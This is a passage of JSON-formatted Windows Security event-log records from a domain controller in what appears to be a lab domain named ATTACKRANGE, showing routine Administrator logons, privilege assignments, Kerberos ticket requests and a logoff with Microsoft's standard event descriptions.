Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4b851","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220339,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4B851\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4b851","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220340,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220341,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220342,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220343,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4BA8A\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4ba8a","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220344,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4BA8A\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4ba8a","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4634,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12545,"OpcodeValue":0,"RecordNumber":220345,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was logged off.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4BA8A\r\n\r\nLogon Type:\t\t\t3\r\n\r\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.","Category":"Logoff","Opcode":"Info","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4ba8a","LogonType":"3","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220346,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220347,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220348,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220349,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CA5C\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{BD69720A-EBB8-17FD-10A4-A954D02393A6}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x4ca5c","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{BD69720A-EBB8-17FD-10A4-A954D02393A6}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220350,"ProcessID":864,"ThreadID":988,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x4CA5C\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x4ca5c","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:49:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
